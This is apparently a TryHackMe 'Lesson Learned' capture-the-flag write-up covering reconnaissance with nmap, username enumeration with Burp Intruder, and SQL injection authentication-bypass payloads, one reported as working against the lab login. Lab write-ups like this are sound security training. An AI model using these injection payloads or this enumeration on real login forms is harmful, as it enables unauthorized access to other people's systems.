# THM - Lesson Learned

## Nmap 

```bash
nmap -sC -sV -oN nmap/nmap.initial 10.10.209.85
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-18 02:23 EST
Nmap scan report for 10.10.209.85
Host is up (0.100s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 2e5489aef7914e336e1089539cf592db (RSA)
|   256 dd2ccafcb76514d488a36e557165f72f (ECDSA)
|_  256 2bc2d81bf47be5785356019a83f37981 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Lesson Learned?
|_http-server-header: Apache/2.4.54 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.20 seconds
```

## Challenge

As it explain in the room description, this is a simple authentication login that we need to bypass to get the flag.

1st i have launch sqlmap. `sqlmap -r login.req`

But i got an error message from the *lesson learned* web page that indicated to me, do not use `OR` this in is banned. And need to reboot the box...

If we pay more attention, we can see that the error message is `Invalid username and password.` It's *AND* not *OR* so i think, we can try to enumerate username.


## Username enumeration

im using burp suite with intruder to enumerate users. And my payloads are fron this wordlist: https://github.com/jeanphorn/wordlist/blob/master/usernames.txt

Annnd, we got user : `kelly` 

```
POST / HTTP/1.1
Host: 10.10.94.117
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: http://10.10.94.117
Connection: close
Referer: http://10.10.94.117/
Upgrade-Insecure-Requests: 1

username=arnold&password=pass
```

And the response was : 

```
[..SNIP..]
Invalid password.</div>
```

## SQLi

Okay so we know that `AND` keywork crash the box. we need to rewrite some SQLi payload :

```
arnold' AND '1
arnold' AND 1 -- -
arnold" AND "" = "
arnold" AND 1 = 1 -- -
arnold'='
arnold'LIKE'
arnold'=0--+
```

Yeeaaaah and this one `arnold' AND 1 -- -` works perfectly (i put this payload as username and password)
